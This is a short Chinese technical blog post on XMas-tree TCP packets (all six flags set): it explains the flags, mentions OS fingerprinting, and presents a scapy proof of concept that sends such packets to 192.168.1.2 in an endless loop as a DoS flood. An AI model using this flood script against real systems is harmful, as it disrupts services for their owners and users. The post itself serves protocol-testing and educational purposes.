【网络协议测试】畸形数据包——圣诞树攻击(DOS攻击)

简介

TCP所有标志位被设置为1的数据包被称为圣诞树数据包(XMas Tree packet),之所以叫这个名是因为这些标志位就像圣诞树上灯一样全部被点亮。

标志位介绍

TCP报文格式:

控制标志(Control Bits)共6个bit位,分别为URG、ACK、PSH、RST、SYN、FIN。

标志位 说明
URG 高优先级数据包
ACK 确认连接
PSH 要求对方数据尽快达到应用层
RST 重置或拒绝连接
SYN 连接请求(SYN=1)或连接接受报文(SYN=1,ACK=1)
FIN 数据发送完毕,请求释放连接

当你发送了这样一个数据包之后,不同的操作系统对其的响应方式是不一样的,因此可以作为目标系统探测的一种方式(6个标志全部为0 ,如果端口是关闭的,Windows机器将应答一个RST | ACK消息,而对于一个开放端口的Linux和UNIX机器则不会应答。)。

此外,通常来说,目标系统需要对这个数据包进行更复杂的处理(毕竟点的灯比较多),相比一般的包处理耗费的资源会更多,因此也可以用作DOS攻击。

附Poc:

python 复制代码
from scapy.all import *
pkt_tree=IP(dst='192.168.1.2')/TCP(dport=8081,flags=0x03f)
while True:
	send(pkt_tree)
相关推荐
范纹杉想快点毕业15 分钟前
Zynq SOC FPGA嵌入式裸机设计和开发教程自学笔记:硬件编程原理、基于SDK库函数编程、软件固化
网络·笔记·stm32·单片机·嵌入式硬件·tcp/ip·fpga开发
wha the fuck4041 小时前
攻防世界-引导-Web_php_unserialize
安全·web安全·网络安全·php
zc-code3 小时前
HTTP性能优化实战:从协议到工具的全面加速指南
网络·网络协议·http·缓存·性能优化·html
Misnice3 小时前
Mac查看本机ip地址
网络协议·tcp/ip·macos
破碎的南瓜3 小时前
OSPF笔记
网络·笔记·智能路由器
IsPrisoner3 小时前
深入分析计算机网络传输层和应用层面试题
网络·学习
德迅云安全杨德俊3 小时前
应用加速游戏盾的安全作用
网络·安全·游戏·ddos
嶔某4 小时前
网络:基础概念
linux·服务器·网络·c++
AORO20254 小时前
三防平板搭载2D扫描头:工业数据采集的革新利器
网络·电脑·制造·信息与通信
pk_xz1234564 小时前
社区资源媒体管理系统设计与实现
网络·python·深度学习·算法·数据挖掘·媒体